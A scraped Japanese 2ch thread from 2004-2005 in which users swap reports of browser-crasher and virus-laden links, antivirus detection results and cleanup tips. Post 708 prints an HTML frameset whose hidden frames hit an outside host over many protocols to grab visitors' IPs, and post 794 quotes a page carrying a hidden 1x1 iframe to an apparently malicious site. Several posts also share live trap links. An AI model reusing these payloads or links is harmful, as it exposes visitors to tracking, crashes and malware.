nyで落とした音楽ZIPにはいっていた EXEファイル、フォルダー型のアイコンにだまされて ダブルクリックしてしまいました CPU50%以上食ってなかなか立ち上がりません タスクマネージャでみるとEXP.EXEで食ってます なんとか対処法をおしえてください!! OSはXPのPROですよろしくおねがいします
>>573 放置されてるっぽいから答えてやろう。
ハードディスクをフォーマットしてOSを再インストールしなさい。
どこに潜んでるかわからないから、つないでいるドライブ全部フォーマットするんだよ。
>573 つーか早くフォーマットしないとカウントダウン始まるよ
あぼーん
>>577 私怨厨房に教えてあげよう。
hotmailって受信時に自動でウイルスチェック入るよ。
漏れはJ混むなのだが、 J-COM Netより新サービスのご案内 『ホームページウイルススキャンサービス』 トライアルを7月6日よりスタート ・・・ってのが着てますた。 この種のブラクラページとかウィルスページに効くのかな? 多分、串みたいなのを通すので遅くなるだろうが・・・ 良く踏むんだよ・・・_| ̄|○
580 :
名無しさん@お腹いっぱい。 :04/07/25 17:12
暇なんで、メールください。 ちなみに18歳の女子高生です。 彼氏没収中。タハ間違えたー★ 募集でーす。(≧▼≦;)アチャ メールまってマース★ ウイルスは勘弁(*゚ー^)/
581 :
名無しさん@お腹いっぱい。 :04/07/25 18:14
>>572 勘弁してくれ・・・
ネットスケープでもOUT!
>>581 何に感染するの?
うちでは無反応なんだけど。
>>572 何だ、ただのブラクラか
IEの強制終了が出来ない環境は、ちょっと辛いかもな。
584 :
名無しさん@お腹いっぱい。 :04/07/25 22:34
>>584 落ちてくるファイルはの拡張子はmp2
ウィルスコード無しとの判定だが責任は持てん。
588 :
名無しさん@お腹いっぱい。 :04/07/28 10:29
[二次元萌えらぼ]、ウイルス反応が出まくってひどいんだけど。 いったい何なの?
あぼーん
590 :
名無しさん@お腹いっぱい。 :04/07/28 14:04
何か変な現象でも起きる?うちは平気なんだけど。
592 :
名無しさん@お腹いっぱい。 :04/07/28 16:29
あぼーん
あぼーん
あぼーん
599 :
名無しさん@お腹いっぱい。 :04/07/31 17:49
601 :
名無しさん@お腹いっぱい。 :04/07/31 21:15
ウイルスのソース、具体的な作り方を 乗っけてるページありませんか? 防御手段の一つとして参考にしてみたいのですが 結構探してますがみつから無いっス('ω')
604 :
ねらいうちっていうファイル? :04/08/05 20:06
起動するとなんかメッセージが出るプログラムっぽいです。 うざいので、知ってる方いたら対処法教えてください。
>605 芸のないブラクラ貼るなヴォケ!! ウイルスなんかいねぇじゃねーか
あげ
ウイルス>グロ画像>ブラクラ
609 :
名無しさん@お腹いっぱい。 :04/08/24 20:39
あぼーん
あぼーん
hotmailには受信時ウイルス駆除機能が付いています。 私怨厨氏ね
荒らし依頼スレに書かれたのを見て来た 記念真紀子
>615 何をどうお願いしてるのかさっぱりわからんが… ここはただのブラクラ貼るスレじゃねーんだって
独り言だが、
>>615 は「Js.Trojan.WindowBomb」か、、、
>617 Norton先生はそうおっしゃったのか… オミトロン越しにソース見ただけだからMcAfeeは反応しなかったよ
620 :
名無しさん@お腹いっぱい。 :04/08/27 00:49
>>620 糞スレを上げたことを悔やみながら、パソコンに潰されてみる。
>620 まずは直リンすんな 中身のEXEファイルがMcAfeeではDownloader-Sとして検出される どうすればいいかは検出されたタイミング次第 そこ開いたときにすぐアンチウイルスソフトのダイアログがでたなら 侵入は防げてるから問題ない あとでキャッシュクリアしてから全ファイルスキャンして何もでてこないことを確認しとけばいい
623 :
名無しさん@お腹いっぱい。 :04/08/27 17:35
infとかレジストリを改変するようなページってある?
あぼーん
625 :
名無しさん@お腹いっぱい。 :04/08/27 20:46
>625 何もないようだが…
アホみたいな質問で申し訳ないんですが。 菌には悪玉、善玉がありますが、 コンピュータウイルスは当然、悪玉ですが、善玉ウイルスみたいなものは 存在するのでしょうか?
善玉のことをあえて「ウイルス」とは呼ばない。
Cookieには善玉、悪玉あるね。
>630 みたらなんなのさ ブラクラでもウイルスでもなし
>622 ありがとうございました!
>634 ふむ、スレタイにのっとったサイトのようで きちんと対策してない人は踏まぬが吉
何それ・・・
調べ物してたら、VBS_REDLOF.A-1に感染しているページを踏む。 管理人宛に感染してますよメールを送る。 メールを発射して2週間。 ウィルス除去なしメールの返事なしサイトの更新あり。 管理人はサイト削除してから回線切って首吊って氏ねと言いたい。 ・・・もう一度メール撃ってみる。 バスターの兄貴には世話になってばかりだ。
>638 スクリプトでなんかごちゃごちゃとやっているようだがウイルス反応はなし
おー、レスが。ありがとです。
レッド・ロフとやらに感染していたようだ。ビルダーが変な反応したので ソースをみたら、もー凄い事になっていた。うpする寸前だった…。
643 :
名無しさん@お腹いっぱい。 :04/10/07 17:29:53
>>645 ※このアドレスは危険URLのひとつです。
※ windowオープンを発見しました。(1)
※ インラインフレームタグを発見しました。 (59)
※ 隠しスクリプトを発見しました。(2)
※ 危険!一部タグが大量に使われています。
[このアドレスの安全度 0%]
648 :
名無しさん@お腹いっぱい。 :04/10/09 14:20:01
649 :
名無しさん@お腹いっぱい。 :04/10/09 15:49:01
\ │ / / ̄\ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ─( ゜ ∀ ゜ )< きんたまきんたま! \_/ \_________ / │ \ ∩ ∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\∩ ∧ ∧ \( ゜∀゜)< きんたまきんたまきんたま! きんたま! >( ゜∀゜ )/ | / \__________ ________/ | 〈 | | / /\_」 / /\」  ̄ / /
650 :
名無しさん@お腹いっぱい。 :04/10/09 19:55:18
>>650 免疫施してウィルス対策ソフトで常駐シールドしておけば、
何を踏んでも問題ない
まあ、98%くらいの確率かな
654 :
俺 VS ウイルス :04/10/11 09:42:04
誰か強烈な貼ってください 俺の改良したウイルスキラーXと勝負さしてみたくて! どんなウイルスにも勝てるはず!!貼ってくれたかたは一応 踏むな!とかいてください
656 :
MyDoom被害者 :04/10/13 01:05:54
新種にハメられてしまいました。実行形式のファイルだけには気をつけていました。 しかし、ある日意味のわからぬC言語のソースファイルの圧縮ファイルが届いてきました。 実行形式ではないので安心して開いてみると、DVDの無修正処理を施すフリーウェアの ソースだとコメントに書いてありました。 早速コンパイルして実行してみたら、感染してしまいました。あれは自身のソースを 無差別にメール添付して送るようで、今日もどこかで罪の無いユーザがコンパイルして いるんだと思います。 C言語も読めないボクの不注意でした。 で、この板に来れば駆除方法を誰か教えてくれるかと期待して、ワームですっかり 重くなったPCにムチ打ってここへ来てみました。トラフィックモニタが今も凄い 事になっているんです。一刻も早く駆除したいです。はい。
>>656 それウィルスじゃなくて、OS改変ワームプログラムですから 残念
自動起動している実行ファイルを突き止めて削除するしかありませんから
レジストリ内の何ヶ所かにある
自動起動に登録されているのから探し出すしかありませんね
658 :
名無しさん@お腹いっぱい。 :04/10/13 02:43:50
>656 罪のあるユーザに届くと亜種が増えるだけだから、おまいも早く駆除 するか、自分自身が駆除されるかしろや!
>>656 ファイアーウォールを入れれば外部に通信しているプログラムを発見出来るべ
OSのプロセス経由だった場合にはわからんけど
660 :
MyDoom被害者 :04/10/13 03:13:14
>659 防火壁!?なんですか、それ。
>661 ウイルス入り、危険
663 :
名無しさん@お腹いっぱい。 :04/11/05 20:41:02
>>656 マイドームかよ.....つれねー香具師だな
ポート侵入型しかかかったことねーからシラネ
そいつのメアド晒して
たくさん釣れてるな
665 :
名無しさん@お腹いっぱい。 :04/11/06 20:25:23
ファイアーウォールで感染防げるものなんですかね?
>665 ネットワーク越しに侵入するタイプのものならね
667 :
名無しさん@お腹いっぱい。 :04/11/07 01:29:25
ー-"'" ⌒,,ィシヽミミiミミ 、 / 三彡彡彡ィ`、ミミミ`、 / シ彡彡彡彡ノ'ヽミミミ`、 ,' ,三彡彡彡彡彡ソ,ー--' l _ _ """'彡彡彡彡彡ノi {;、 ';;;='''"""` 彡彡彡 - 、ノノi kr) .ィェー 彡彡' r、ヽ}彡i レ' .. シ彡' )ァ' /彡' と、心からそう思う吉宗であった。 {_,,,、 ;、 シ彡 ニンミミ{ l '''"::. 彡ミi ! ̄"` ...:::::::: ノ""{ l .......::::::::: / \_
, - ´ ̄`ヽ、_ 激しく大漁!!! | `ヽ、 || /⌒_ゝ \ .|| __/_ _ヽ `- 、 || >_-X- _<=- 、 ) .||─´__, -- 、--、`' > ( ||__イ´イ、ル/_レルイi- ´ `, |L レリrij ´し'r,iレ ヽ ( / ) ルi、 '、フ イyルリ ヽ ト||ヽノリレ`,- イ⌒ 、 Λ_Λ (⌒ヽ>、_r/ ヽ,イi Σ ( )-, L|`,イノ ` / > ⊂、 < `----´-⌒`ヽ, ヽ、 __つ / y/⌒ヽ ヽ、 ヽ_i /L y' i |_r-ゝ :: 。 く,__〜ヽ_ゝ- 「 ̄ i--´ :: /ヽ /  ̄(  ̄ ) 。 /ヽ、 , ' ´ヽイ' / ' ̄y ̄ ヽ、 人 ノ \ `---´ r' ゝ ノ -
671 :
名無しさん@お腹いっぱい。 :04/11/07 02:55:09
672 :
名無しさん@お腹いっぱい。 :04/11/10 02:06:13
自分も探し物してたら、間違って感染したっぽいです。 なんかパソ起動時に、ダイヤルアップの接続が5回ぐらい勝手に出てきます。 いま、トレンドマイクロオンラインチェックしてますが、 もし感染が確認できたらどうすれば直せますか?
>672 ウイルスの種類にもよるし ウイルスじゃないかも知れんし それだけじゃわからん
674 :
672 :04/11/11 05:59:12
今日スキャンしようとしたら、IEまともに開かないし、 IE起動時の設定のページいつもと違うし、 ダイヤルアップの接続が勝手に3回ぐらい出てくるし、 IE使い物にならない。(T_T) 昨日オンラインスキャンしたら感染してないって出たものの、 一昨日は3種類ぐらいに6項目ぐらい出てきた気が… 誰かどうにかしてください。(;_;) とりあえず今日は携帯から。 ウイルスじゃないとしたらなにが考えられますか?
>>674 大変なのはわかるがマルチはやめとけ
逆に答えてもらえなくなるぞ
676 :
674 :04/11/11 06:52:16
ウイルスなら一刻も早く被害が出る前に治したいもので… やっぱりマルチだとマナー悪いとかネタとか荒らしに思われちゃいますかね? とりあえずはスレ的にこっちの可能性もありだったんで書いたんですが…。
>>676 ブラウザジャッカーとかスパイウェアも関係してるんじゃない?
もう一台PCがあれば、ツールをDLしてくれば?
あぼーん
>>672 なあ、まさか感染してるPCで書き込んでないよな?
680 :
名無しさん@お腹いっぱい。 :04/11/14 19:16:09
>>681 IE6最新バッチ、ウィルスバスター2005+SPYBOT免疫+SpywareBlaster
俺もこれで踏んでみたくなった。
>682 別に止めやしないが、そこのページのリンク先も似たようなトラップの巣だから 下手にあちこちあけない方がいいぞ
684 :
名無しさん@お腹いっぱい。 :04/11/20 11:27:47
IEが遅くなるウィルスってあります?
>684 IEの動きを遅くすることを目的としたウイルスは聞いたことがないが、 ウイルスの活動によって、結果的にIEの動作が重くなるのならありうる
686 :
sage :04/11/20 16:00:14
さがってなかった ごめんなさい
689 :
名無しさん@お腹いっぱい。 :04/11/26 01:14:12
う
※このアドレスは危険URLのひとつです。
このスレ開くだけで、avastに怒られるんだけど
随分と息の長いスレだなぁ。 (´ー`)y-~~
良スレage
694 :
名無しさん@お腹いっぱい。 :04/12/02 22:26:29
695 :
名無しさん@お腹いっぱい。 :04/12/02 22:28:58
>695 ただのgifファイルですが何か?
>>688 のアド、なにも知らずに他のスレで踏んじゃった・・・
ノートン先生にパソコンスキャンしてもらったら
ウイルス4つ感染。一応修復だか、削除は完了したと出てきたけど・・・
他にしておいたほうがいい対処はありますか?
699 :
名無しさん@お腹いっぱい。 :04/12/04 01:43:17
ここは鑑定スレじゃないんだけど。
HEZ E-ADDY
あぼーん
703 :
名無しさん@お腹いっぱい。 :04/12/08 23:44:47
zg009174.ppp.dion.ne.jp
あぼーん
>>705 注意!アラートオープンを発見! (1)
危険!ニュースストームを発見! (1)
危険!Telnetストームを発見! (1)
さらにIP抜きのオマケ付き
>>705 何が -厨房ホイホイ1号♪- だよ
痛くも痒くもないわ
708 :
名無しさん@お腹いっぱい。 :04/12/15 09:12:31
<html>
<frameset rows="100%,0,0,0,0,0,0,0,0,0">
<frame src="
http://www.hellplant.org/cgi-bin/xoor/serpent.cgi?mode=ipget&port=3457 ">
<frame src="
ftp://www.hellplant.org:3457/ " scrolling=no noresize>
<frame src="gopher://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="
https://www.hellplant.org:3457/ " scrolling=no noresize>
<frame src="pnm://www.hellplant.org:3457/pnmiptrace" scrolling=no noresize>
<frame src="mms://www.hellplant.org:3457/mmsiptrace" scrolling=no noresize>
<frame src="rlogin://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="tn3270://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="telnet://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="news://www.hellplant.org:3457/" scrolling=no noresize>
</frameset>
</html>
709 :
名無しさん@お腹いっぱい。 :04/12/17 09:48:20
開いただけのページで1500くらいウィルスに感染したぽ・・・・・
マジなことなんだけどね、このページ開いたらavastが反応した。 なんで?
>711 上の方にアンチウイルスソフトが誤反応するような文字列が書き込まれてるから
Symantec マンセー ヽ(´▽`)ノ
715 :
名無しさん@お腹いっぱい。 :05/02/02 10:40:53
>>715 おめえバカだろ?
ウィンドウズアップデートはしていないは、
ウィルス対策ソフトはいれていないは
717 :
名無しさん@お腹いっぱい。 :05/02/02 10:51:49
>>716 すみません。怒らないで。。
どうしたら良い?
720 :
名無しさん@お腹いっぱい。 :05/02/02 11:11:04
>>718 >>719 ありがとう;;
頭いいしやさしいし。付き合いたいくらいだよ。
本当にありがとう。やってみます。
>>720 〃 i, ,. -‐
r' ィ=ゝー-、-、、r=‐ヮォ.〈 /
! :l ,リ|} |. } / .や
. {. | ′ | } l
レ-、{∠ニ'==ァ 、==ニゞ< | ら
!∩|.}. '"旬゙` ./''旬 ` f^| |
l(( ゙′` ̄'" f::` ̄ |l.| | な
. ヽ.ヽ {:. lリ |
. }.iーi ^ r' ,' ノ い
!| ヽ. ー===- / ⌒ヽ
. /} \ ー‐ ,イ l か
__/ ‖ . ヽ、_!__/:::|\ ヽ
>>720 さっさと直してしまいたい時
システムの復元
少しは勉強しとこうと思う時
テンプレを実行
723 :
名無しさん@お腹いっぱい。 :05/02/02 11:30:56
>>722 理解しました。どうもありがとう。
ちゃんと勉強します。
最近2ちゃんのスレを開いたら警告が出てくるのですが、修復不可能且つウィルスへのアクセス拒否で 駆除をすることができません。bloodhound.Exploit6という名前です。
あぼーん
あぼーん
727 :
名無しさん@お腹いっぱい。 :05/02/14 18:20:56
728 :
名無しさん@ :05/02/15 13:37:37
729 :
名無しさん@ :05/02/15 13:40:05
追記 ネットサーフィンするには、特に問題ないのですが、毎回上記の記載 したURLが出てくるので目障りです。 なんとかならないでしょうか、、、
730 :
名無しさん@お腹いっぱい。 :05/02/16 08:01:38
http://qrl.jp/?178330 ↑はどうですか?
なんか血の涙を流してる女性の画像が出て
「ぎゃあああああああああああああああああああ」
って声が出て、
「あなたのPCは36時間以内に呪われます」
みたいなのがでたんですが。
731 :
名無しさん@お腹いっぱい。 :05/02/16 17:17:56
>>728 とりあえずSpybot、Ad-Aware SE、CWShredder
を試してみたら?
ったまくるよぉ・・・・・ GoldenRetrivereだっけか?あんの野郎偽装ファイルまではいいけどSP2のダミーにリンク張ってるから 思わず削除してまったよぉぉおおお。 修復でリカバリできたからいいけど依存関係にまで手を加えれるものなんだろか? くっそ〜AltaVistaでLongHornなんて探すんじゃなかったよ・・・・
この前、「2ちゃんねるの こんな時計はイヤだ!その2」のどこかのリンクを踏んで、海外のホームページのフラッシュ画像を閲覧しただけで、 軽いウィルスに感染してしまいました。「Trojan.ByteVerify ウイルス」でした。ページを開いた途端にNorton AntiVirusがはじき、 「感染しています。」というメッセージが出てびっくりしました。その後、ウィルスチェックしてみると、IEの一時ファイルのところで ウイルスが1つだけ見つかりました。もちろん駆除できましたが。 ウィルス対策ソフトを入れておいて本当に良かったです。あと少しで期限が切れますので、新しいソフト購入を検討してます。
736 :
名無しさん@お腹いっぱい。 :05/02/21 21:18:25
初めまして。ちょっと種類の違う質問ですがご了承ください。 Windowsとノートンのアップデートは最新版でウイルスチェックをして 「脅威は見つかりません」と出れば、もう安心してよろしいのでしょうか? それともノートンで見つからない脅威もあるのでしょうか?
>>736 いっぱいあるわな
だから、予防の方が大切
738 :
736 :05/02/21 21:48:48
>>737 そうなんですか…毎日アップデートはチェックしているんですが
今日ブラクラ踏んでしまって、Trojan byteVerifyってウイルスが
一時検出されました。
再起動して一時ファイル消してチェックしたところ、何も
検出されなかったので安心したのですが…油断しない方いいみたいですね。
739 :
名無しさん@お腹いっぱい。 :05/02/24 02:13:48
Linuxユーザになってから、ブラクラもウィルスサイトも 踏んで踏んで踏みまくっている。Windows時代には怖くて 近づくことすら出来なかったサイトを、踏みまくって気分爽快。 俺の靴の底の味はどーよ?ってな気分だ。
>>739 グロ画像はOS何使っててもアウトだがな。
>>739 酷い目に合わされた過去への清算?なの...
あぼーん
743 :
名無しさん :05/03/03 00:18:42
>>738 そういう時こそ、HD革命WinProtectorを使ったら、再起動時に感染の痕跡まで消してくれるぜ。
744 :
名無しさん@お腹いっぱい。 :05/03/03 00:41:40
このスレの「全部」部分をクリックすると、Avast!が警告を出すんですが?
745 :
名無しさん@お腹いっぱい。 :05/03/03 00:50:01
>>745 AntiVirというフリーソフトで検出できたヽ(´ー`)ノ
>>745 なんだ ノートンでもマカフィーでも検知するんじゃないかよ
749 :
名無しさん@お腹いっぱい。 :05/03/14 20:09:30
ここは鑑定スレじゃないんだが。 つーか、ローマ字も読めないとは。
初歩的なブラクラだな
754 :
名無しさん@お腹いっぱい。 :05/03/20 01:36:41
756 :
名無しさん@お腹いっぱい。 :2005/03/24(木) 10:20:53
ウイルスバスターを使っているのですが、ここにあるリンクを踏んだら感染しますか?
>>756 ウィンドウズアップデートしていないやつはすり抜けられたら
マジでスパイウェアを放り込まれる
>>752 <HTML>
<img src="sahra9714.jpg">
</HTML>
ソース こんなんでウィルス仕込めるかよ
だから相手するなよ。鑑定スレじゃないんだから。 ウィルス食らった(かも知れない)香具師は質問スレへどうぞ。
>>733 V3ウィルスブロック2005を購入しました。その代わり、ファイアーウォールの監視が
厳しくなりましたが、ウィルスに感染するよりはマシだと観念しました。
766 :
名無しさん@お腹いっぱい。 :2005/04/06(水) 20:42:15
767 :
nec :2005/04/06(水) 20:46:12
あぼーん
771 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
糞炉利サイト死ね!!!11!1!!勝手に飛ばすなボゲェェェェ!!!
tp://www.tiduru.sytes.net/img-box/img20040727015957.jpg
776 :
名無しさん@お腹いっぱい。 :2005/04/29(金) 13:01:32
>>768 ※このアドレスは危険URLのひとつです。
危険!Telnetストームを発見! (400)
>>776 一回目はjavascripを使ったウイルスで10個来た。
もう一回踏んでみると、HTML_REDIR.A コレだ!
まぁセキュリティソフト入ってるんなら入っても問題なし。
PCがガリガリいうだけ
>>776 海外アダルトが出てくるなwなかなか粋なHPだ
780 :
名無しさん@お腹いっぱい。 :2005/05/06(金) 21:12:09
ノートン入れた状態でここ開くと五月蝿いですよね。
781 :
名無しさん@お腹いっぱい。 :2005/05/06(金) 21:19:26
782 :
名無しさん@お腹いっぱい。 :2005/05/10(火) 20:55:59
>>782 たぶんトロイだろう
こっちで調べたらとりあえず"Trojan.Win32.StartPage.pz."なんてのが引っ掛かった
>>782 JAVA_BYTEVER.Aてのが3個
このスレにはったあるのでノートンやバスターをかいくぐり windowsの動作に影響を及ぼすサイトってある??
価格comがやばいらしい。
790 :
名無しさん@お腹いっぱい。 :2005/05/20(金) 20:59:03
AVGで片っ端から踏んだけど何もでないや??
そりゃ糞いや。
>>790 まさにWindows Updateに救われているソフトですな
793 :
名無しさん@お腹いっぱい。 :2005/05/21(土) 12:23:04
この板のトロイの木馬2台目というスレで即ノートン先生が検出したぞ! ウィルス張ったやつ市ね。
>>789 <HTML lang="ja">
<HEAD><TITLE>画像掲示板(Light)</TITLE>
<STYLE>
</STYLE>
</HEAD>
<BODY BGCOLOR="#FAF0E6" BACKGROUND="" TEXT="#2F4F4F" LINK="#6060FF" VLINK="#4040FF">
<BR>
<FONT SIZE="+1" COLOR="#FF0000"><B> </B></FONT>
名前:<FONT COLOR="#00FF00"><B> </B></FONT>
[2005/05/08,11:10:23] No.271 <a href="imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050508111023&parent=271">返信</a>
<BLOCKQUOTE><!-- body_start -->
<a target="_blank" href="
http://lol.to/book.php?book=ilove ">HOT PUSY</a><br><BR>
http://lol.to/book.php?book=BAVAK<BR >
<iframe src="
http://www1.pimpspace.com/beach/Beach/XXX.html " height="1" width="1"></iframe><!-- user: ?igip-fo.rzone.de-->
</BLOCKQUOTE>
</BODY>
</HTML>
796 :
名無しさん@お腹いっぱい。 :2005/05/21(土) 12:56:44
age
この脆弱性を利用された場合、これらを利用するDownload Ject関連の脆弱性を残したままでいると、 ウィルスだけじゃなくて、仕込んだやつに知識があってプログラムも書けるやつだと、 コンピュータ内のファイルを切り刻んだり、システムファイルを消してしまったり、 実際に何でも可能で悪質なプログラムを実行されてしまう。
>>795 のサイトは死んでいたりする時もあって悪質だな
今は生きているわ
>>789 ウイルスバスターで踏んでみたけどHTML_REDIR.Aしか検知しなかったorz
801 :
名無しさん@お腹いっぱい。 :2005/05/26(木) 11:04:38
803 :
名無しさん@お腹いっぱい。 :2005/05/26(木) 11:31:40
>802 わかりました。 どーもです。
804 :
名無しさん@お腹いっぱい。 :2005/05/28(土) 14:40:29
すいません教えてほしいのですがブラクラふんでしまい ウイルスアラートがでてしまったのですがひとつウイルスが削除できません でしたみたいなのがでたんですがどうしたらいいでしょうか? トレンドでオンラインスキャンしたらHTML_REDIR.Aというウイルスでした ウイルス対策ソフトはVirus scanの最新版をつかっても アラートに反応しませんでした パソコン初心者なのでどうしたらいいかわからません ウインドウズXPですああぁ〜どうしよう・・・・ 誰か教えてください・・・・
807 :
名無しさん@お腹いっぱい。 :2005/05/28(土) 20:30:57
インターネットオプションのファイル削除でキャッシュファイルを削除すれば、多分消えるぞ! クッキーも念のため消してくれ それでも、だめなら感染したファイルを手動で消してくれ。
808 :
名無しさん@お腹いっぱい。 :2005/05/28(土) 22:20:46
809 :
名無しさん@お腹いっぱい。 :2005/05/29(日) 17:44:22
>>804 パソコン、買い替えだね。
あと、すでに知人から恨まれているはずだから、皆に謝っておくように
811 :
名無しさん@お腹いっぱい。 :2005/05/29(日) 21:06:14
あのう 声優板を見ようとすると、それだけで Nortonがウイルスを検知するんですけど、これはいったいどーゆー事でしょうか?
812 :
名無しさん@お腹いっぱい。 :2005/05/30(月) 00:25:20
このページ開いたら俺のNOD32が反応したんだが、どこぞのカキコですか?
>>784 の"Trojan.Win32.StartPage.pz.に感染してしまったのだがどうしたらいいのでしょう?
ちなみにSD画像掲示板って所を開いただけで感染しますた。
815 :
名無しさん@お腹いっぱい。 :2005/05/30(月) 21:45:27
iframeでなんか仕込んであるようだがスクリプト読むの('A`)マンドクセ
>>815 スクリプトで引っ掛かるようなものなんてないね
誤認
Activexコントロールインストールのポップアップに反応しているのかも?
>815 フリーのゲームサイトでこんなのほっとくとわ さすがキムチの国ですよね
宣伝おめ
nyでDLしたファイル(H系)解凍した瞬間にCドライブ内のJPEGとZIPファイルが全部壊れました。 容量が全部26KBになってました。ny見てみたらノード情報のとこに「ぬるぽ」と「ガッ」のAAが… その後ny起動させても全く動きません。新しくny本体をDLして前と同じ設定しても動きません。 ウイルスバスターで検索してもなにもひっかかりません。nyが動かない以外は別に何も症状ないんですが… 誰か詳しく教えてください、よろしくお願いします…
何が凄いってこのスレをIEで開いた時に警告が出てしまった事。 avastってそれなり?
825 :
名無しさん@お腹いっぱい。 :2005/06/14(火) 14:50:26
上げ
826 :
名無しさん@お腹いっぱい。 :2005/06/14(火) 17:55:29
半角2次元板を開くと Bloodhound.Exploit.6ってのを検知したんですが・・・。 2回やってみましたがノートン先生が2回検知しました。
828 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 21:26:27
ソースとAVGを入れて「782」のURLを踏んでみたら, AVGの方が反応しました。S社の性能はフリー以下なんでしょうか・・・?
829 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
>>828 片方のAVに引っ掛かったら普通はもう片方には引っ掛からないものなんだが…
いやそれ以前に、ソースとAVGを同居させてるのか?
(複数の常駐型AVの同居は原則的にタブー)
>>828 仕様的には片方がブラウザでの実行を阻止した時点で、もう一方はそのファイルへのアクセスを
OSに排他処理されてしまうので検出すら出来ない。
しかし、S社のソフトはDownload Jectの脆弱性を攻撃するスクリプトファイルを
まず、ほとんど検出しない。
「ウィンドウズアップデートしろよ!」の姿勢なんだろう。
だが、セキュリティソフトとしては失格である。
833 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 01:00:58
困ってますお願いします。
2ちゃんの懸賞板で張ってあったこのリンクをクリックしたら
ttp://www.porn-news.net/ TAROJ_SMAL.STというファイルがトレンドマイクロのオンラインスキャンを
したら検出しました。
それで、システムの復元をしてもエラーで復元できず、
IEを開くたびに変な広告サイトやアダルトサイトが表示されてしまって
困ってます。
どうしたらいいのかまったく分からないので教えていただけないでしょうか。。
OSはウインドーズMEです。よろしくおねがいします
835 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 01:29:58
>>834 そうなんですがどうしたらいいのでしょう・・
やっぱりウイルスバスターとか買わないとダメなのかな。不安です。。
836 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 01:31:56
834さんよる遅くにレスありがとうございます。
>>789 ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
VBS/TrojanDownloader.Small.S トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Win32/TrojanDownloader.Ani.C トロイ切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
Java/Exploit.Bytverify.F トロイ 切断されました
ウイルスの可能性 : トロイ HTML/Exploit.Mht.A の亜種切断されました
複数のウイルス切断されました
一応12個くらい見つかった。NOD32でアドバンストヒューリスティック機能有効。
838 :
名無しさん@お腹いっぱい。 :2005/07/07(木) 23:22:29
硫黄
あぼーん
↑何を書いてたんだろ?
あぼーん
あぼーん
845 :
名無しさん@お腹いっぱい。 :2005/07/16(土) 19:45:29
あげ
846 :
名無しさん@お腹いっぱい。 :2005/07/16(土) 20:33:03
>>844 危険!このアドレスはワンクリック詐欺サイトのひとつです。
注意!Set-Cookieが使われています。
注意!PHPに対応したサーバーです。
フィッシングチェックが終了しました。
[フィッシング詐欺などの可能性(Beta-Test) : 100%]
>>842 上のアドレスは36個も反応してくれたぞ。
NOD32(アドバンストヒューリスティック機能有効)
>>847 ワンクリック詐欺用だから危険でも何でもないと思うけどね、今時。
ファイルのダウンロードの時もどきの画面が出るんで、「何かインストールしてしまった?」
みたいな錯覚を起こさせる狡猾な詐欺ではあるね。
ただスピードが笑っちゃうね、1Mbpsで接続してんのに2.7Mbpsとかだし、
MeとかでもXPのデザインだしね。
>>850 そこで何をしたらどうなったのか書かんと誰にも対処のしようがないぞ
そこのページ自体は何の変哲もなさそうだしな
853 :
名無しさん@お腹いっぱい。 :2005/08/29(月) 20:10:47
ウイルスセキュリティでここを開いたら,ウイルスだと反応しました。
854 :
名無しさん@お腹いっぱい。 :2005/08/30(火) 15:09:03
趣旨とは違うが 中国 やふーに行って 天安門 などを検索 すると 2回目以降で.......
858 :
名無しさん@お腹いっぱい。 :2005/10/01(土) 14:08:39
怖いですねー。
860 :
名無しさん@お腹いっぱい。 :2005/10/02(日) 07:36:48
>>861 サンクス
それしか方法ないのですか
CDさがしてきも(´・ω・`)
866 :
名無しさん@お腹いっぱい。 :2005/10/04(火) 13:27:03
カスペルスキークラスのウイルス対策ソフトじゃないと怖くて踏めないサイトだらけだなw avast!+BitDefender 8 Free Editionでは無理ですw
いつも言ってるがおめえらレベルが貼り付けてるのなんて屁でもないわ アホくさあ
いつ、何処で言ったんだよ?
869 :
名無しさん@お腹いっぱい。 :2005/10/04(火) 19:44:30
わざと感染させようと思って、WindowsUpdateだけやったSP2でカスタマイズもしないで 丸裸で踏んでいるんだけど、もう1年も何も拾わないんだよな。 ダメだ おまえらは。 やばかったのは去年の5月頃だけ。 まだDownload Jectの脆弱性が完全に対応されないままで市場に情報だけ流れてしまったからな。
871 :
名無しさん@お腹いっぱい。 :2005/10/04(火) 23:15:45
(・3・) エェー どんどんお願します。
>>872 ∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) < これからもYorosiku !!
| | | \_____
(__)___)
874 :
名無しさん@お腹いっぱい。 :2005/10/08(土) 01:15:10
ひひひ
>>875 意図はともかく郵送ってのが良くわからん
こういう事はスピードが大事なのに
∧_∧ ( ´∀`) / ̄ ̄ ̄ ̄ ̄ ( ) < パソ壊れた。 | | | \_____ (__)___)
>>147 これはひどい。
返信は来るはず。。
From: "
[email protected] " <
[email protected] >
To: <*******@yahoo.co.jp>
Subject: Re: ウィルス検体
キングソフトサポートセンターです。
ご報告ありがとうございます。
いただいたデータもしくはURLを検証いたしております。
対応でき次第、アップデートにて対応する予定です。
ただし、新種と診断された場合は、再度ご連絡を差し上げます。
よろしくお願いします。
883 :
882 :2005/10/12(水) 11:03:44
誤爆しちゃいました。すみません
>>147 これはひどい。
返信は来るはず。。
From: "
[email protected] " <
[email protected] >
To: <*******@yahoo.co.jp>
